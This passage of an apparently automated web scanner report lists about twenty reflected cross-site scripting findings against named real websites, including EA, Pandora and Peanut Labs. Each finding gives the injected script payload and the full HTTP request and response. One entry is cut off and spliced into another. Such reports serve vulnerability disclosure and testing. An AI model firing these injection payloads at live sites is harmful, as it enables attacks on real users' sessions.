Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=qg2f822huup33e8vdjs9ee1p80; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platformd1666"><script>alert(1)</script>0c0acabc5be/ps3-games" />
...[SNIP]...

3.577. http://www.ea.com/platform/ps3-games [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/ps3-games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ff7"><script>alert(1)</script>3d766d616d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/ps3-gamesb7ff7"><script>alert(1)</script>3d766d616d5 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:26 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=eclo7i73cfqlnl7uaeqlknq0g6; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platform/ps3-gamesb7ff7"><script>alert(1)</script>3d766d616d5" />
...[SNIP]...

3.578. http://www.ea.com/platform/ps3-games [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/ps3-games

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e73"><script>alert(1)</script>17436741d31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/ps3-games?82e73"><script>alert(1)</script>17436741d31=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:49 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=luocner863ance16967gh02qs0; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 85039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/ps3-games?82e73"><script>alert(1)</script>17436741d31=1">
...[SNIP]...

3.579. http://www.ea.com/platform/xbox-360-games [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/xbox-360-games

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9838c"><script>alert(1)</script>d99c4148412 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform9838c"><script>alert(1)</script>d99c4148412/xbox-360-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:13 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=ghogbj07oe5vmhojil9itqhbl0; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platform9838c"><script>alert(1)</script>d99c4148412/xbox-360-games" />
...[SNIP]...

3.580. http://www.ea.com/platform/xbox-360-games [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/xbox-360-games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9216f"><script>alert(1)</script>e3244aad044 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/xbox-360-games9216f"><script>alert(1)</script>e3244aad044 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:17 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=3g5dcbo2tg5kp6hne4mvnq76f3; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platform/xbox-360-games9216f"><script>alert(1)</script>e3244aad044" />
...[SNIP]...

3.581. http://www.ea.com/platform/xbox-360-games [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/xbox-360-games

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7223"><script>alert(1)</script>38f7d5e6e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/xbox-360-games?c7223"><script>alert(1)</script>38f7d5e6e2c=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:42 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=9cg06j3gera3opfjeuupp54g93; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 84502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/xbox-360-games?c7223"><script>alert(1)</script>38f7d5e6e2c=1">
...[SNIP]...

3.582. http://www.ea.com/wii [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/wii

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73bb4"><script>alert(1)</script>d65c535f196 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wii73bb4"><script>alert(1)</script>d65c535f196 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:31 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=g1f11esrsvgvlcmd3l6f10r4o0; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/wii73bb4"><script>alert(1)</script>d65c535f196" />
...[SNIP]...

3.583. http://www.ea.com/wii [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/wii

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42ab4"><script>alert(1)</script>a2f77cd35b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wii?42ab4"><script>alert(1)</script>a2f77cd35b6=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:52 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=jinvebj2q69pplgb192rrvfur0; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/wii?42ab4"><script>alert(1)</script>a2f77cd35b6=1">
...[SNIP]...

3.584. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.freshnews.com
Path:	/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a24d"><img%20src%3da%20onerror%3dalert(1)>29cb609e200 was submitted in the REST URL parameter 2. This input was echoed as 5a24d"><img src=a onerror=alert(1)>29cb609e200 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/3881925a24d"><img%20src%3da%20onerror%3dalert(1)>29cb609e200/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1
Host: www.freshnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:19:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESSdcb5af41d343fdd786908e4442f98f39=91rc3s8ulbvqetmeddh6fkmtr6; expires=Tue, 01-Feb-2011 08:52:25 GMT; path=/; domain=.freshnews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 05:19:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/news/3881925a24d"><img src=a onerror=alert(1)>29cb609e200/article-435118.html">
...[SNIP]...

3.585. http://www.intellicast.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf718"style%3d"x%3aexpression(alert(1))"9a54e9bc174 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf718"style="x:expression(alert(1))"9a54e9bc174 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?cf718"style%3d"x%3aexpression(alert(1))"9a54e9bc174=1 HTTP/1.1
Host: www.intellicast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:44:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1oeundvugcjciyemwdighyuu; path=/; HttpOnly
Set-Cookie: RecentLocations=@:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: Pop=0; path=/
Set-Cookie: vw=1; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64857
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:10:48 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1"><title>
In
...[SNIP]...
<a href="/Default.aspx?unit=C&cf718"style="x:expression(alert(1))"9a54e9bc174=1">
...[SNIP]...

3.586. http://www.intellicast.com/Local/Weather.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/Local/Weather.aspx

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db83d'-alert(1)-'e027fe9bbf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?db83d'-alert(1)-'e027fe9bbf5=1 HTTP/1.1
Host: www.mlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:44:46 GMT
Date: Sun, 09 Jan 2011 01:44:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascri
...[SNIP]...
f';

OAS_listpos = 'Leaderboard,SiteSponsor,Rectangle,RectangleBelow,BannerBottom,HalfTile1,Feature1,Feature2,Feature3,Feature4,ImpactAd,Sponsor4,Sponsor5,Button1,Sponsor1,Sponsor2';

OAS_query = 'db83d'-alert(1)-'e027fe9bbf5=1';
OAS_target = '_top';
//end of configuration
</SCRIPT>
...[SNIP]...

3.590. http://www.outofhanwell.com/blog/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outofhanwell.com
Path:	/blog/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e199a"><script>alert(1)</script>d7f28494553 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e199a"><script>alert(1)</script>d7f28494553/index.php HTTP/1.1
Host: www.outofhanwell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 05:23:20 GMT
Server: Apache
Content-Length: 2340
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
<frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.outofhanwell.com/e199a"><script>alert(1)</script>d7f28494553/index.php">
...[SNIP]...

3.591. http://www.outofhanwell.com/blog/index.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outofhanwell.com
Path:	/blog/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30833"><script>alert(1)</script>87e69a6bfec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/30833"><script>alert(1)</script>87e69a6bfec HTTP/1.1
Host: www.outofhanwell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 05:23:22 GMT
Server: Apache
Content-Length: 2335
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
<frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.outofhanwell.com/blog/30833"><script>alert(1)</script>87e69a6bfec">
...[SNIP]...

3.592. http://www.pandora.com/people/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/people/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8db"><script>alert(1)</script>09862348e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /people/?cf8db"><script>alert(1)</script>09862348e83=1 HTTP/1.1
Host: www.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:20:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 13162

<html>

<head>

<title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>


       <link rel="stylesheet" type="text/css" href="/styles/pandora_styles.css" />


<link rel="alter
...[SNIP]...
<input type="hidden" name="target" value="/people/?webname=&cf8db"><script>alert(1)</script>09862348e83=1">
...[SNIP]...

3.593. http://www.peanutlabs.com/core.php [coreClass parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The value of the coreClass request parameter is copied into the XML document as plain text between tags. The payload 21731<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>813616225af was submitted in the coreClass parameter. This input was echoed as 21731<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>813616225af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /core.php?sk=d12cec1a4fc53db354ed1c228a0de882&module=publisher&coreClass=ParentCompanyInitCmd21731<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>813616225af&coreName=CmdCore&writer=XMLCmdWriter HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard2.swf?id=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:33:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
Content-Length: 229

<?xml version="1.0"?><errorInfo><error><![CDATA[Class ParentCompanyInitCmd21731<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>813616225af does not exist]]></error><reset><![C
...[SNIP]...

3.594. http://www.peanutlabs.com/core.php [coreClass parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The value of the coreClass request parameter is copied into the HTML document as plain text between tags. The payload c0786<img%20src%3da%20onerror%3dalert(1)>92aed5e9cf6 was submitted in the coreClass parameter. This input was echoed as c0786<img src=a onerror=alert(1)>92aed5e9cf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /core.php?coreClass=IdCmdc0786<img%20src%3da%20onerror%3dalert(1)>92aed5e9cf6&cmd=init&module=user&email=&userId=998826224-3432-8939b981e2&user_id=998826224-3432-8939b981e2&writer=JSONManualCmdWriter&minIndex=0&maxIndex=4&back=undefined&category=&standbyIcon=undefined&iframe_tag=&rewardAvailable=&coreName=CmdCore HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:34:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 106

{"errorInfo":{"error":"Class IdCmdc0786<img src=a onerror=alert(1)>92aed5e9cf6 does not exist","reset":1}}

3.595. http://www.peanutlabs.com/core.php [iframe_tag parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The value of the iframe_tag request parameter is copied into the HTML document as plain text between tags. The payload 6d2fe<script>alert(1)</script>8329d0dc6 was submitted in the iframe_tag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core.php?coreClass=IdCmd&cmd=init&module=user&email=&userId=998826224-3432-8939b981e2&user_id=998826224-3432-8939b981e2&writer=JSONManualCmdWriter&minIndex=0&maxIndex=4&back=undefined&category=&standbyIcon=undefined&iframe_tag=6d2fe<script>alert(1)</script>8329d0dc6&rewardAvailable=&coreName=CmdCore HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:35:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 02:35:42 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 27869

{"uid":"12633542","user_id":"998826224-3432-8939b981e2","network_uid":"998826224-1-3432.sa","created":"2011-01-08 20:33:15","verified":"0","id":"12633542","name":"Pogo Subs","email":"test4@fastdial.ne
...[SNIP]...
rs old","target":"complete","checked":"false"}]}}],"redirect":[{"id":"screenout"},{"id":"complete","content":"\/pl\/acceptOffer.php?userId=998826224-3432-8939b981e2&offerInvitationId=133066&iframe_tag=6d2fe<script>alert(1)</script>8329d0dc6"}]}},"Survey_67740":{"survey":{"hash":"82c437276314f70cf943ff983dbc1d32","t":"0;0;0;0;1","vc":"Week","reward":"1","currency_logo":"","index":"1","offer_id":"67740","duration":"15 minutes","title":"Sho
...[SNIP]...

3.596. http://www.peanutlabs.com/core.php [rewardAvailable parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The value of the rewardAvailable request parameter is copied into the HTML document as plain text between tags. The payload c00a4<img%20src%3da%20onerror%3dalert(1)>d0ead2e6fff was submitted in the rewardAvailable parameter. This input was echoed as c00a4<img src=a onerror=alert(1)>d0ead2e6fff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /core.php?coreClass=IdCmd&cmd=init&module=user&email=&userId=998826224-3432-8939b981e2&user_id=998826224-3432-8939b981e2&writer=JSONManualCmdWriter&minIndex=0&maxIndex=4&back=undefined&category=&standbyIcon=undefined&iframe_tag=&rewardAvailable=c00a4<img%20src%3da%20onerror%3dalert(1)>d0ead2e6fff&coreName=CmdCore HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
